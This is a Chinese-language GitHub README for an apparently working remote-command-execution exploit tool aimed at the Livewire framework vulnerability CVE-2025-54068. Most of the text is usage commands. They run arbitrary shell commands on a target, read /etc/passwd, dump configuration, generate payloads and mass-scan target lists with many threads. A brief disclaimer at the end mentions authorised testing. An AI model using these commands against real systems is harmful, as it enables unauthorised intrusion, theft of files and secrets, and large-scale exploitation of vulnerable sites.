haxorstars/CVE-2025-54068

GitHub: haxorstars/CVE-2025-54068

针对 Livewire 框架 CVE-2025-54068 漏洞的远程命令执行利用工具,支持批量检测与自定义 payload。

Stars: 3 | Forks: 2

# CVE-2025-54068 这是一个旨在利用 CVE-2025-54068 的工具,如果在已知 Livewire 项目 APP_KEY 的情况下,可实现远程命令执行。 该工具是基于 **Synacktiv** 的原始项目重新编写的版本: * **Livepyre** — [https://github.com/synacktiv/Livepyre](https://github.com/synacktiv/Livepyre) 核心概念和方法论基于原始实现。 此版本包含了一些细微的增强和额外功能,以提升可用性和灵活性。 ## 安装 使用 pipx 安装该工具: ``` pipx install git+https://github.com/haxorstars/CVE-2025-54068 ``` 或使用 uv: ``` uv tool install git+https://github.com/haxorstars/CVE-2025-54068 ``` ## 🚀 基本用法 针对单个目标运行该工具: ``` livewire-rce-2025 -u target.com ``` 使用自定义参数: ``` livewire-rce-2025 -u https://target.com -p "id;uname -a;pwd;ls -la" ``` ## 🛠️ 自定义功能 执行预定义的自定义功能: ``` livewire-rce-2025 -u target.com --custom-function "shell:ls -la" livewire-rce-2025 -u target.com --custom-function "read:/etc/passwd" livewire-rce-2025 -u target.com --custom-function "phpinfo" livewire-rce-2025 -u target.com --custom-function "config" ``` 在一条命令中组合多个功能: ``` livewire-rce-2025 -u target.com --custom-function "shell:whoami && shell:id && read:/etc/passwd" ``` ## 🧩 自定义 PHP 文件 使用您自己的 PHP payload 文件: ``` livewire-rce-2025 -u target.com --custom-file custom.php --param "shell:id" ``` ## 🧪 仅生成 Payload 生成 payload 但不将其发送到目标: ``` livewire-rce-2025 -generate-payload --custom-function "shell:ls -la" ``` 或使用自定义 PHP 文件: ``` livewire-rce-2025 -generate-payload --custom-file custom.php ``` ## 📦 批量检查 从文件中扫描多个目标: ``` livewire-rce-2025 -mass-check targets.txt -o results.json ``` 使用自定义线程数: ``` livewire-rce-2025 -mass-check targets.txt -t 20 -o results.json ``` ## ⚠️ 免责声明 本工具仅供**教育和授权安全测试目的**使用。请勿针对您不拥有或未获得明确测试许可的系统使用本工具。 祝您 Hacking 愉快😄
标签:APP_KEY泄露, CISA项目, CVE-2025-54068, EXP, Laravel, Livewire, OpenVAS, Payload生成, PHP, POC, Python, RCE, 反序列化, 命令注入, 密钥利用, 批量检测, 无后门, 白盒审计, 编程工具, 网络安全, 远程代码执行, 逆向工具, 隐私保护